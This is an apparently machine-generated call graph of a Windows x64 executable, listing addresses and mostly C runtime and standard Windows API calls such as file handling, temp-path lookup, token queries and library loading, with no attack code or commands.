__CxxCallCatchBlock 17085->17089 17086->17085 17088 7ff6ceb3b2ec 17087->17088 17090 7ff6ceb3b3cc _wfindfirst32i64 14 API calls 17088->17090 17090->17089 17092 7ff6ceb3bf00 __CxxCallCatchBlock 45 API calls 17091->17092 17093 7ff6ceb434a9 17092->17093 17101 7ff6ceb35b5c EnterCriticalSection 17094->17101 17103 7ff6ceb2288c 17102->17103 17104 7ff6ceb352b4 49 API calls 17103->17104 17105 7ff6ceb228dd 17104->17105 17106 7ff6ceb35cb4 _get_daylight 11 API calls 17105->17106 17107 7ff6ceb228e2 17106->17107 17121 7ff6ceb35cd4 17107->17121 17110 7ff6ceb21ee0 49 API calls 17111 7ff6ceb22911 __scrt_get_show_window_mode 17110->17111 17112 7ff6ceb28de0 57 API calls 17111->17112 17113 7ff6ceb22946 17112->17113 17114 7ff6ceb2294b 17113->17114 17115 7ff6ceb22983 MessageBoxA 17113->17115 17116 7ff6ceb28de0 57 API calls 17114->17116 17117 7ff6ceb2299d 17115->17117 17118 7ff6ceb22965 MessageBoxW 17116->17118 17119 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17117->17119 17118->17117 17120 7ff6ceb229ad 17119->17120 17120->16300 17122 7ff6ceb3c078 _get_daylight 11 API calls 17121->17122 17123 7ff6ceb35ceb 17122->17123 17124 7ff6ceb228e9 17123->17124 17125 7ff6ceb3f948 _get_daylight 11 API calls 17123->17125 17128 7ff6ceb35d2b 17123->17128 17124->17110 17126 7ff6ceb35d20 17125->17126 17127 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17126->17127 17127->17128 17128->17124 17133 7ff6ceb40018 17128->17133 17131 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 17132 7ff6ceb35d70 17131->17132 17134 7ff6ceb40035 17133->17134 17136 7ff6ceb4003a 17134->17136 17139 7ff6ceb35d51 17134->17139 17140 7ff6ceb40084 17134->17140 17135 7ff6ceb35cb4 _get_daylight 11 API calls 17137 7ff6ceb40044 17135->17137 17136->17135 17136->17139 17138 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17137->17138 17138->17139 17139->17124 17139->17131 17140->17139 17141 7ff6ceb35cb4 _get_daylight 11 API calls 17140->17141 17141->17137 17143 7ff6ceb28f14 WideCharToMultiByte 17142->17143 17144 7ff6ceb28f82 WideCharToMultiByte 17142->17144 17146 7ff6ceb28f3e 17143->17146 17147 7ff6ceb28f55 17143->17147 17145 7ff6ceb28faf 17144->17145 17152 7ff6ceb23f6b 17144->17152 17149 7ff6ceb229c0 57 API calls 17145->17149 17148 7ff6ceb229c0 57 API calls 17146->17148 17147->17144 17150 7ff6ceb28f6b 17147->17150 17148->17152 17149->17152 17151 7ff6ceb229c0 57 API calls 17150->17151 17151->17152 17152->16311 17152->16312 17154 7ff6ceb240ea 17153->17154 17155 7ff6ceb28de0 57 API calls 17154->17155 17156 7ff6ceb24112 17155->17156 17171 7ff6ceb28d00 FindFirstFileExW 17156->17171 17159 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17160 7ff6ceb23f88 17159->17160 17160->16309 17160->16318 17162 7ff6ceb24352 17161->17162 17163 7ff6ceb28de0 57 API calls 17162->17163 17164 7ff6ceb24380 CreateFileW 17163->17164 17165 7ff6ceb243b7 GetFinalPathNameByHandleW CloseHandle 17164->17165 17166 7ff6ceb2441f 17164->17166 17165->17166 17167 7ff6ceb243e3 __vcrt_InitializeCriticalSectionEx 17165->17167 17168 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17166->17168 17170 7ff6ceb28ef0 59 API calls 17167->17170 17169 7ff6ceb23fb9 17168->17169 17169->16309 17170->17166 17172 7ff6ceb28d3d FindClose 17171->17172 17173 7ff6ceb28d50 17171->17173 17172->17173 17174 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17173->17174 17175 7ff6ceb2411c 17174->17175 17175->17159 17177 7ff6ceb27dee 17176->17177 17178 7ff6ceb3b1d3 17176->17178 17177->16336 17178->17177 17179 7ff6ceb3b25c __std_exception_copy 37 API calls 17178->17179 17180 7ff6ceb3b200 17179->17180 17180->17177 17181 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 17180->17181 17182 7ff6ceb3b230 17181->17182 17184 7ff6ceb24060 116 API calls 17183->17184 17185 7ff6ceb21ac6 17184->17185 17186 7ff6ceb284c0 83 API calls 17185->17186 17193 7ff6ceb21c74 17185->17193 17189 7ff6ceb21afe 17186->17189 17187 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17188 7ff6ceb21c88 17187->17188 17188->16346 17216 7ff6ceb23e80 17188->17216 17214 7ff6ceb21b2f 17189->17214 17222 7ff6ceb31004 17189->17222 17191 7ff6ceb3097c 74 API calls 17191->17193 17192 7ff6ceb21b18 17194 7ff6ceb21b1c 17192->17194 17195 7ff6ceb21b34 17192->17195 17193->17187 17196 7ff6ceb22870 59 API calls 17194->17196 17226 7ff6ceb30ccc 17195->17226 17196->17214 17199 7ff6ceb21b67 17202 7ff6ceb31004 73 API calls 17199->17202 17200 7ff6ceb21b4f 17201 7ff6ceb22870 59 API calls 17200->17201 17201->17214 17203 7ff6ceb21bb4 17202->17203 17204 7ff6ceb21bc6 17203->17204 17205 7ff6ceb21bde 17203->17205 17206 7ff6ceb22870 59 API calls 17204->17206 17207 7ff6ceb30ccc _fread_nolock 53 API calls 17205->17207 17206->17214 17208 7ff6ceb21bf3 17207->17208 17209 7ff6ceb21bf9 17208->17209 17210 7ff6ceb21c0e 17208->17210 17212 7ff6ceb22870 59 API calls 17209->17212 17229 7ff6ceb30a40 17210->17229 17212->17214 17214->17191 17215 7ff6ceb22b10 59 API calls 17215->17214 17217 7ff6ceb21ee0 49 API calls 17216->17217 17218 7ff6ceb23e9d 17217->17218 17218->16356 17220 7ff6ceb21ee0 49 API calls 17219->17220 17221 7ff6ceb24170 17220->17221 17221->16346 17223 7ff6ceb31034 17222->17223 17235 7ff6ceb30d94 17223->17235 17225 7ff6ceb3104d 17225->17192 17247 7ff6ceb30cec 17226->17247 17230 7ff6ceb30a49 17229->17230 17231 7ff6ceb21c22 17229->17231 17232 7ff6ceb35cb4 _get_daylight 11 API calls 17230->17232 17231->17214 17231->17215 17236 7ff6ceb30dfe 17235->17236 17237 7ff6ceb30dbe 17235->17237 17236->17237 17239 7ff6ceb30e0a 17236->17239 17238 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17237->17238 17240 7ff6ceb30de5 17238->17240 17246 7ff6ceb35b5c EnterCriticalSection 17239->17246 17240->17225 17248 7ff6ceb30d16 17247->17248 17259 7ff6ceb21b49 17247->17259 17249 7ff6ceb30d25 __scrt_get_show_window_mode 17248->17249 17250 7ff6ceb30d62 17248->17250 17248->17259 17252 7ff6ceb35cb4 _get_daylight 11 API calls 17249->17252 17260 7ff6ceb35b5c EnterCriticalSection 17250->17260 17254 7ff6ceb30d3a 17252->17254 17256 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17254->17256 17256->17259 17259->17199 17259->17200 17262 7ff6ceb28921 __std_exception_destroy 17261->17262 17263 7ff6ceb2889f GetTokenInformation 17261->17263 17266 7ff6ceb2893a 17262->17266 17267 7ff6ceb28934 CloseHandle 17262->17267 17264 7ff6ceb288cb 17263->17264 17265 7ff6ceb288c0 GetLastError 17263->17265 17264->17262 17268 7ff6ceb288e7 GetTokenInformation 17264->17268 17265->17262 17265->17264 17266->16365 17267->17266 17268->17262 17269 7ff6ceb2890a 17268->17269 17269->17262 17270 7ff6ceb28914 ConvertSidToStringSidW 17269->17270 17270->17262 17272 7ff6ceb28975 17271->17272 17288 7ff6ceb35508 17272->17288 17276 7ff6ceb22c50 17275->17276 17277 7ff6ceb352b4 49 API calls 17276->17277 17278 7ff6ceb22c9b __scrt_get_show_window_mode 17277->17278 17279 7ff6ceb28de0 57 API calls 17278->17279 17280 7ff6ceb22cd0 17279->17280 17281 7ff6ceb22d0d MessageBoxA 17280->17281 17282 7ff6ceb22cd5 17280->17282 17283 7ff6ceb22d27 17281->17283 17284 7ff6ceb28de0 57 API calls 17282->17284 17285 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17283->17285 17286 7ff6ceb22cef MessageBoxW 17284->17286 17287 7ff6ceb22d37 17285->17287 17286->17283 17287->16375 17291 7ff6ceb35562 17288->17291 17289 7ff6ceb35587 17290 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17289->17290 17294 7ff6ceb355b1 17290->17294 17291->17289 17292 7ff6ceb355c3 17291->17292 17306 7ff6ceb338c0 17292->17306 17296 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17294->17296 17295 7ff6ceb356a4 17297 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17295->17297 17299 7ff6ceb28998 17296->17299 17297->17294 17299->16372 17300 7ff6ceb35679 17303 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17300->17303 17301 7ff6ceb356ca 17301->17295 17302 7ff6ceb356d4 17301->17302 17305 7ff6ceb3b700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17302->17305 17303->17294 17304 7ff6ceb35670 17304->17295 17304->17300 17305->17294 17307 7ff6ceb338fe 17306->17307 17308 7ff6ceb338ee 17306->17308 17309 7ff6ceb33907 17307->17309 17314 7ff6ceb33935 17307->17314 17310 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17308->17310 17311 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17309->17311 17312 7ff6ceb3392d 17310->17312 17311->17312 17312->17295 17312->17300 17312->17301 17312->17304 17314->17308 17314->17312 17317 7ff6ceb342d4 17314->17317 17350 7ff6ceb33d20 17314->17350 17387 7ff6ceb334b0 17314->17387 17318 7ff6ceb34316 17317->17318 17319 7ff6ceb34387 17317->17319 17320 7ff6ceb3431c 17318->17320 17321 7ff6ceb343b1 17318->17321 17322 7ff6ceb3438c 17319->17322 17323 7ff6ceb343e0 17319->17323 17324 7ff6ceb34350 17320->17324 17325 7ff6ceb34321 17320->17325 17406 7ff6ceb32684 17321->17406 17326 7ff6ceb343c1 17322->17326 17327 7ff6ceb3438e 17322->17327 17329 7ff6ceb343f7 17323->17329 17331 7ff6ceb343ea 17323->17331 17335 7ff6ceb343ef 17323->17335 17332 7ff6ceb34327 17324->17332 17324->17335 17325->17329 17325->17332 17413 7ff6ceb32274 17326->17413 17330 7ff6ceb34330 17327->17330 17339 7ff6ceb3439d 17327->17339 17420 7ff6ceb34fdc 17329->17420 17348 7ff6ceb34420 17330->17348 17390 7ff6ceb34a88 17330->17390 17331->17321 17331->17335 17332->17330 17338 7ff6ceb34362 17332->17338 17346 7ff6ceb3434b 17332->17346 17335->17348 17424 7ff6ceb32a94 17335->17424 17338->17348 17400 7ff6ceb34dc4 17338->17400 17339->17321 17340 7ff6ceb343a2 17339->17340 17344 7ff6ceb34e88 37 API calls 17340->17344 17340->17348 17342 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17343 7ff6ceb3471a 17342->17343 17343->17314 17344->17346 17345 7ff6ceb350f0 45 API calls 17349 7ff6ceb3460c 17345->17349 17346->17345 17346->17348 17346->17349 17348->17342 17349->17348 17431 7ff6ceb3f7b8 17349->17431 17351 7ff6ceb33d2e 17350->17351 17352 7ff6ceb33d44 17350->17352 17354 7ff6ceb34316 17351->17354 17355 7ff6ceb34387 17351->17355 17366 7ff6ceb33d84 17351->17366 17353 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17352->17353 17352->17366 17353->17366 17356 7ff6ceb3431c 17354->17356 17357 7ff6ceb343b1 17354->17357 17358 7ff6ceb3438c 17355->17358 17359 7ff6ceb343e0 17355->17359 17360 7ff6ceb34350 17356->17360 17361 7ff6ceb34321 17356->17361 17364 7ff6ceb32684 38 API calls 17357->17364 17362 7ff6ceb343c1 17358->17362 17363 7ff6ceb3438e 17358->17363 17365 7ff6ceb343f7 17359->17365 17368 7ff6ceb343ea 17359->17368 17372 7ff6ceb343ef 17359->17372 17369 7ff6ceb34327 17360->17369 17360->17372 17361->17365 17361->17369 17370 7ff6ceb32274 38 API calls 17362->17370 17367 7ff6ceb34330 17363->17367 17376 7ff6ceb3439d 17363->17376 17383 7ff6ceb3434b 17364->17383 17373 7ff6ceb34fdc 45 API calls 17365->17373 17366->17314 17371 7ff6ceb34a88 47 API calls 17367->17371 17386 7ff6ceb34420 17367->17386 17368->17357 17368->17372 17369->17367 17374 7ff6ceb34362 17369->17374 17369->17383 17370->17383 17371->17383 17375 7ff6ceb32a94 38 API calls 17372->17375 17372->17386 17373->17383 17377 7ff6ceb34dc4 46 API calls 17374->17377 17374->17386 17375->17383 17376->17357 17378 7ff6ceb343a2 17376->17378 17377->17383 17381 7ff6ceb34e88 37 API calls 17378->17381 17378->17386 17379 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17380 7ff6ceb3471a 17379->17380 17380->17314 17381->17383 17382 7ff6ceb350f0 45 API calls 17385 7ff6ceb3460c 17382->17385 17383->17382 17383->17385 17383->17386 17384 7ff6ceb3f7b8 46 API calls 17384->17385 17385->17384 17385->17386 17386->17379 17465 7ff6ceb318f8 17387->17465 17391 7ff6ceb34aae 17390->17391 17392 7ff6ceb314b0 12 API calls 17391->17392 17402 7ff6ceb34df9 17400->17402 17407 7ff6ceb326b7 17406->17407 17408 7ff6ceb326e6 17407->17408 17410 7ff6ceb327a3 17407->17410 17412 7ff6ceb32723 17408->17412 17443 7ff6ceb31558 17408->17443 17411 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17410->17411 17411->17412 17412->17346 17414 7ff6ceb322a7 17413->17414 17415 7ff6ceb322d6 17414->17415 17417 7ff6ceb32393 17414->17417 17416 7ff6ceb31558 12 API calls 17415->17416 17419 7ff6ceb32313 17415->17419 17416->17419 17418 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17417->17418 17418->17419 17419->17346 17421 7ff6ceb3501f 17420->17421 17423 7ff6ceb35023 __crtLCMapStringW 17421->17423 17451 7ff6ceb35078 17421->17451 17423->17346 17425 7ff6ceb32ac7 17424->17425 17426 7ff6ceb32af6 17425->17426 17428 7ff6ceb32bb3 17425->17428 17427 7ff6ceb31558 12 API calls 17426->17427 17430 7ff6ceb32b33 17426->17430 17427->17430 17429 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17428->17429 17429->17430 17430->17346 17433 7ff6ceb3f7e9 17431->17433 17440 7ff6ceb3f7f7 17431->17440 17433->17440 17440->17349 17444 7ff6ceb3158f 17443->17444 17450 7ff6ceb3157e 17443->17450 17445 7ff6ceb3e3ac _fread_nolock 12 API calls 17444->17445 17444->17450 17450->17412 17452 7ff6ceb35096 17451->17452 17453 7ff6ceb3509e 17451->17453 17454 7ff6ceb350f0 45 API calls 17452->17454 17453->17423 17454->17453 17466 7ff6ceb3192d 17465->17466 17467 7ff6ceb3193f 17465->17467 17468 7ff6ceb35cb4 _get_daylight 11 API calls 17466->17468 17469 7ff6ceb3194d 17467->17469 17473 7ff6ceb31989 17467->17473 17470 7ff6ceb31932 17468->17470 17471 7ff6ceb3b5cc _invalid_parameter_noinfo 37 API calls 17469->17471 17472 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17470->17472 17474 7ff6ceb3193d 17471->17474 17472->17474 17475 7ff6ceb31d05 17473->17475 17477 7ff6ceb35cb4 _get_daylight 11 API calls 17473->17477 17474->17314 17475->17474 17476 7ff6ceb35cb4 _get_daylight 11 API calls 17475->17476 17478 7ff6ceb31f99 17476->17478 17479 7ff6ceb31cfa 17477->17479 17480 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17478->17480 17481 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 17479->17481 17480->17474 17481->17475 17483 7ff6ceb27b76 17482->17483 17484 7ff6ceb27b9a 17483->17484 17485 7ff6ceb27bed GetTempPathW 17483->17485 17486 7ff6ceb27d70 61 API calls 17484->17486 17487 7ff6ceb27c02 17485->17487 17488 7ff6ceb27ba6 17486->17488 17521 7ff6ceb22810 17487->17521 17533 7ff6ceb27630 17488->17533 17499 7ff6ceb27c1b __std_exception_destroy 17522 7ff6ceb22835 17521->17522 17523 7ff6ceb35508 48 API calls 17522->17523 17524 7ff6ceb22854 17523->17524 17524->17499 17534 7ff6ceb2763c 17533->17534 17535 7ff6ceb28de0 57 API calls 17534->17535 17536 7ff6ceb2765e 17535->17536 17537 7ff6ceb27666 17536->17537 17538 7ff6ceb27679 ExpandEnvironmentStringsW 17536->17538 17815 7ff6ceb21716 17814->17815 17816 7ff6ceb2172e 17814->17816 17817 7ff6ceb22b10 59 API calls 17815->17817 17818 7ff6ceb21758 17816->17818 17819 7ff6ceb21734 17816->17819 17821 7ff6ceb21722 17817->17821 17907 7ff6ceb27e20 17818->17907 17944 7ff6ceb212a0 17819->17944 17821->16407 17825 7ff6ceb2174f 17825->16407 17826 7ff6ceb217a9 17830 7ff6ceb24060 116 API calls 17826->17830 17827 7ff6ceb2177d 17829 7ff6ceb22870 59 API calls 17827->17829 17828 7ff6ceb22b10 59 API calls 17828->17825 17831 7ff6ceb21793 17829->17831 17832 7ff6ceb217be 17830->17832 17831->16407 17833 7ff6ceb217c6 17832->17833 17834 7ff6ceb217de 17832->17834 17836 7ff6ceb22b10 59 API calls 17833->17836 17835 7ff6ceb31004 73 API calls 17834->17835 17837 7ff6ceb217ef 17835->17837 17838 7ff6ceb217d5 17836->17838 17857 7ff6ceb22d66 17856->17857 17858 7ff6ceb21ee0 49 API calls 17857->17858 17860 7ff6ceb22d99 17858->17860 17859 7ff6ceb230ca 17860->17859 17861 7ff6ceb23e80 49 API calls 17860->17861 17862 7ff6ceb22e07 17861->17862 17863 7ff6ceb23e80 49 API calls 17862->17863 17864 7ff6ceb22e18 17863->17864 17865 7ff6ceb22e39 17864->17865 17866 7ff6ceb22e75 17864->17866 18066 7ff6ceb23190 17865->18066 17867 7ff6ceb23190 75 API calls 17866->17867 17869 7ff6ceb22e73 17867->17869 17870 7ff6ceb22ef6 17869->17870 17871 7ff6ceb22eb4 17869->17871 17873 7ff6ceb23190 75 API calls 17870->17873 18074 7ff6ceb277b0 17871->18074 17875 7ff6ceb22f20 17873->17875 17879 7ff6ceb23190 75 API calls 17875->17879 17884 7ff6ceb22fbc 17875->17884 17908 7ff6ceb27e30 17907->17908 17909 7ff6ceb21ee0 49 API calls 17908->17909 17910 7ff6ceb27e71 17909->17910 17925 7ff6ceb27ef1 17910->17925 17987 7ff6ceb23ff0 17910->17987 17912 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17913 7ff6ceb21775 17912->17913 17913->17826 17913->17827 17914 7ff6ceb27f2b 17993 7ff6ceb279d0 17914->17993 17917 7ff6ceb27d70 61 API calls 17922 7ff6ceb27ea2 __std_exception_destroy 17917->17922 17919 7ff6ceb27f14 17920 7ff6ceb27ee0 17923 7ff6ceb22c30 59 API calls 17920->17923 17922->17919 17922->17920 17923->17925 17925->17912 17945 7ff6ceb212b2 17944->17945 17946 7ff6ceb24060 116 API calls 17945->17946 17947 7ff6ceb212e2 17946->17947 17948 7ff6ceb212ea 17947->17948 17949 7ff6ceb21301 17947->17949 17950 7ff6ceb22b10 59 API calls 17948->17950 17951 7ff6ceb31004 73 API calls 17949->17951 17956 7ff6ceb212fa __std_exception_destroy 17950->17956 17952 7ff6ceb21313 17951->17952 17953 7ff6ceb21317 17952->17953 17954 7ff6ceb2133d 17952->17954 17955 7ff6ceb22870 59 API calls 17953->17955 17958 7ff6ceb21358 17954->17958 17959 7ff6ceb21380 17954->17959 17957 7ff6ceb2132e 17955->17957 17960 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17956->17960 17961 7ff6ceb3097c 74 API calls 17957->17961 17962 7ff6ceb22870 59 API calls 17958->17962 17963 7ff6ceb2139a 17959->17963 17970 7ff6ceb21453 17959->17970 17964 7ff6ceb21444 17960->17964 17961->17956 17965 7ff6ceb21373 17962->17965 17966 7ff6ceb21050 98 API calls 17963->17966 17964->17825 17964->17828 17967 7ff6ceb3097c 74 API calls 17965->17967 17968 7ff6ceb213ab 17966->17968 17967->17956 17971 7ff6ceb214c2 __std_exception_destroy 17968->17971 17977 7ff6ceb213b3 17968->17977 17969 7ff6ceb3097c 74 API calls 17972 7ff6ceb213bf 17969->17972 17973 7ff6ceb30ccc _fread_nolock 53 API calls 17970->17973 17975 7ff6ceb214ab 17970->17975 17970->17977 17973->17970 17978 7ff6ceb22870 59 API calls 17975->17978 17977->17969 17978->17971 17988 7ff6ceb23ffa 17987->17988 17989 7ff6ceb28de0 57 API calls 17988->17989 17990 7ff6ceb24022 17989->17990 17991 7ff6ceb2c010 _wfindfirst32i64 8 API calls 17990->17991 17992 7ff6ceb2404a 17991->17992 17992->17914 17992->17917 17992->17922 17994 7ff6ceb279e0 17993->17994 18067 7ff6ceb231c4 18066->18067 18068 7ff6ceb352b4 49 API calls 18067->18068 18069 7ff6ceb231ea 18068->18069 18070 7ff6ceb231fb 18069->18070 18126 7ff6ceb365dc 18069->18126 18072 7ff6ceb2c010 _wfindfirst32i64 8 API calls 18070->18072 18073 7ff6ceb23219 18072->18073 18073->17869 18075 7ff6ceb277be 18074->18075 18076 7ff6ceb24060 116 API calls 18075->18076 18077 7ff6ceb277ed 18076->18077 18127 7ff6ceb365f9 18126->18127 18128 7ff6ceb36605 18126->18128 18385 7ff6ceb36918 18384->18385 18386 7ff6ceb3693e 18385->18386 18389 7ff6ceb36971 18385->18389 18387 7ff6ceb35cb4 _get_daylight 11 API calls 18386->18387 18388 7ff6ceb36943 18387->18388 18390 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 18388->18390 18391 7ff6ceb36977 18389->18391 18392 7ff6ceb36984 18389->18392 18395 7ff6ceb240b9 18390->18395 18393 7ff6ceb35cb4 _get_daylight 11 API calls 18391->18393 18403 7ff6ceb3b9e0 18392->18403 18393->18395 18395->16482 18416 7ff6ceb411a8 EnterCriticalSection 18403->18416 18764 7ff6ceb398c4 18763->18764 18767 7ff6ceb393a0 18764->18767 18768 7ff6ceb393bb 18767->18768 18769 7ff6ceb393ea 18767->18769 18790 7ff6ceb2c27e RtlLookupFunctionEntry 18789->18790 18791 7ff6ceb2c09b 18790->18791 18792 7ff6ceb2c294 RtlVirtualUnwind 18790->18792 18793 7ff6ceb2c030 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18791->18793 18792->18790 18792->18791 18795 7ff6ceb24060 116 API calls 18794->18795 18796 7ff6ceb215b7 18795->18796 18797 7ff6ceb215bf 18796->18797 18798 7ff6ceb215e0 18796->18798 18799 7ff6ceb22b10 59 API calls 18797->18799 18800 7ff6ceb31004 73 API calls 18798->18800 18801 7ff6ceb215cf 18799->18801 18802 7ff6ceb215f1 18800->18802 18801->16510 18803 7ff6ceb21611 18802->18803 18804 7ff6ceb215f5 18802->18804 18806 7ff6ceb21641 18803->18806 18807 7ff6ceb21621 18803->18807 18805 7ff6ceb22870 59 API calls 18804->18805 18816 7ff6ceb2160c __std_exception_destroy 18805->18816 18808 7ff6ceb21656 18806->18808 18814 7ff6ceb2166d 18806->18814 18810 7ff6ceb22870 59 API calls 18807->18810 18811 7ff6ceb21050 98 API calls 18808->18811 18809 7ff6ceb3097c 74 API calls 18812 7ff6ceb216e7 18809->18812 18810->18816 18811->18816 18812->16510 18813 7ff6ceb30ccc _fread_nolock 53 API calls 18813->18814 18814->18813 18815 7ff6ceb216ae 18814->18815 18814->18816 18817 7ff6ceb22870 59 API calls 18815->18817 18816->18809 18817->18816 18820 7ff6ceb219c3 18818->18820 18821 7ff6ceb2195f 18818->18821 18819 7ff6ceb35860 45 API calls 18819->18821 18820->16516 18821->18819 18821->18820 18823 7ff6ceb28de0 57 API calls 18822->18823 18824 7ff6ceb28487 LoadLibraryExW 18823->18824 18825 7ff6ceb284a4 __std_exception_destroy 18824->18825 18825->16537 18886 7ff6ceb25de0 18885->18886 18887 7ff6ceb21ee0 49 API calls 18886->18887 18888 7ff6ceb25e12 18887->18888 18889 7ff6ceb25e3b 18888->18889 18890 7ff6ceb25e1b 18888->18890 18892 7ff6ceb25e92 18889->18892 18894 7ff6ceb24140 49 API calls 18889->18894 18891 7ff6ceb22b10 59 API calls 18890->18891 18896 7ff6ceb25e31 18891->18896 18893 7ff6ceb24140 49 API calls 18892->18893 18895 7ff6ceb25eab 18893->18895 18897 7ff6ceb25e5c 18894->18897 18898 7ff6ceb25ec9 18895->18898 18902 7ff6ceb22b10 59 API calls 18895->18902 18900 7ff6ceb2c010 _wfindfirst32i64 8 API calls 18896->18900 18899 7ff6ceb25e7a 18897->18899 18904 7ff6ceb22b10 59 API calls 18897->18904 18903 7ff6ceb28470 58 API calls 18898->18903 18905 7ff6ceb23ff0 57 API calls 18899->18905 18901 7ff6ceb2344e 18900->18901 18901->16558 18913 7ff6ceb25f30 18901->18913 18902->18898 18906 7ff6ceb25ed6 18903->18906 18904->18899 18907 7ff6ceb25e84 18905->18907 18908 7ff6ceb25edb 18906->18908 18909 7ff6ceb25efd 18906->18909 18907->18892 18910 7ff6ceb28470 58 API calls 18907->18910 18911 7ff6ceb229c0 57 API calls 18908->18911 18983 7ff6ceb253f0 GetProcAddress 18909->18983 18910->18892 18911->18896 19067 7ff6ceb24ff0 18913->19067 18915 7ff6ceb25f54 18984 7ff6ceb25430 GetProcAddress 18983->18984 18988 7ff6ceb25412 18983->18988 18985 7ff6ceb25455 GetProcAddress 18984->18985 18984->18988 18985->18988 18986 7ff6ceb229c0 57 API calls 18988->18986 19069 7ff6ceb25015 19067->19069 19068 7ff6ceb2501d 19068->18915 19069->19068 19070 7ff6ceb251af 19069->19070 19109 7ff6ceb374f4 19069->19109 19071 7ff6ceb2535a __std_exception_destroy 19070->19071 19072 7ff6ceb24450 47 API calls 19070->19072 19071->18915 19072->19070 19110 7ff6ceb37524 19109->19110 19113 7ff6ceb369f0 19110->19113 19209 7ff6ceb3bf00 __CxxCallCatchBlock 45 API calls 19208->19209 19210 7ff6ceb3b191 19209->19210 19211 7ff6ceb3b2bc __CxxCallCatchBlock 45 API calls 19210->19211 19212 7ff6ceb3b1b1 19211->19212 20091 7ff6ceb2b1cc 20092 7ff6ceb2a656 20091->20092 20093 7ff6ceb2a5d3 20091->20093 20093->20092 20094 7ff6ceb2b850 12 API calls 20093->20094 20094->20092 20720 7ff6ceb3d2d0 20731 7ff6ceb411a8 EnterCriticalSection 20720->20731 19213 7ff6ceb2b2dc 19214 7ff6ceb2a5da 19213->19214 19216 7ff6ceb2a656 19214->19216 19217 7ff6ceb2b850 19214->19217 19218 7ff6ceb2b873 19217->19218 19219 7ff6ceb2b88f memcpy_s 19217->19219 19220 7ff6ceb3e3ac 12 API calls 19218->19220 19219->19216 19220->19219 19221 7ff6ceb404dc 19222 7ff6ceb406ce 19221->19222 19225 7ff6ceb4051e _isindst 19221->19225 19223 7ff6ceb35cb4 _get_daylight 11 API calls 19222->19223 19241 7ff6ceb406be 19223->19241 19224 7ff6ceb2c010 _wfindfirst32i64 8 API calls 19226 7ff6ceb406e9 19224->19226 19225->19222 19227 7ff6ceb4059e _isindst 19225->19227 19242 7ff6ceb470e4 19227->19242 19232 7ff6ceb406fa 19234 7ff6ceb3b6b8 _wfindfirst32i64 17 API calls 19232->19234 19235 7ff6ceb4070e 19234->19235 19239 7ff6ceb405fb 19239->19241 19266 7ff6ceb47128 19239->19266 19241->19224 19243 7ff6ceb405bc 19242->19243 19244 7ff6ceb470f3 19242->19244 19248 7ff6ceb464e8 19243->19248 19273 7ff6ceb411a8 EnterCriticalSection 19244->19273 19249 7ff6ceb464f1 19248->19249 19253 7ff6ceb405d1 19248->19253 19250 7ff6ceb35cb4 _get_daylight 11 API calls 19249->19250 19251 7ff6ceb464f6 19250->19251 19252 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19251->19252 19252->19253 19253->19232 19254 7ff6ceb46518 19253->19254 19255 7ff6ceb405e2 19254->19255 19256 7ff6ceb46521 19254->19256 19255->19232 19260 7ff6ceb46548 19255->19260 19257 7ff6ceb35cb4 _get_daylight 11 API calls 19256->19257 19258 7ff6ceb46526 19257->19258 19259 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19258->19259 19259->19255 19261 7ff6ceb405f3 19260->19261 19262 7ff6ceb46551 19260->19262 19261->19232 19261->19239 19263 7ff6ceb35cb4 _get_daylight 11 API calls 19262->19263 19264 7ff6ceb46556 19263->19264 19265 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 19264->19265 19265->19261 19274 7ff6ceb411a8 EnterCriticalSection 19266->19274 20736 7ff6ceb2c2e0 20737 7ff6ceb2c2f0 20736->20737 20753 7ff6ceb3a95c 20737->20753 20739 7ff6ceb2c2fc 20759 7ff6ceb2c5d8 20739->20759 20741 7ff6ceb2c314 _RTC_Initialize 20751 7ff6ceb2c369 20741->20751 20764 7ff6ceb2c788 20741->20764 20742 7ff6ceb2c8bc 7 API calls 20743 7ff6ceb2c395 20742->20743 20745 7ff6ceb2c329 20767 7ff6ceb39dc8 20745->20767 20751->20742 20752 7ff6ceb2c385 20751->20752 20754 7ff6ceb3a96d 20753->20754 20755 7ff6ceb3a975 20754->20755 20756 7ff6ceb35cb4 _get_daylight 11 API calls 20754->20756 20755->20739 20757 7ff6ceb3a984 20756->20757 20758 7ff6ceb3b698 _invalid_parameter_noinfo 37 API calls 20757->20758 20758->20755 20760 7ff6ceb2c5e9 20759->20760 20763 7ff6ceb2c5ee __scrt_acquire_startup_lock 20759->20763 20761 7ff6ceb2c8bc 7 API calls 20760->20761 20760->20763 20762 7ff6ceb2c662 20761->20762 20763->20741 20792 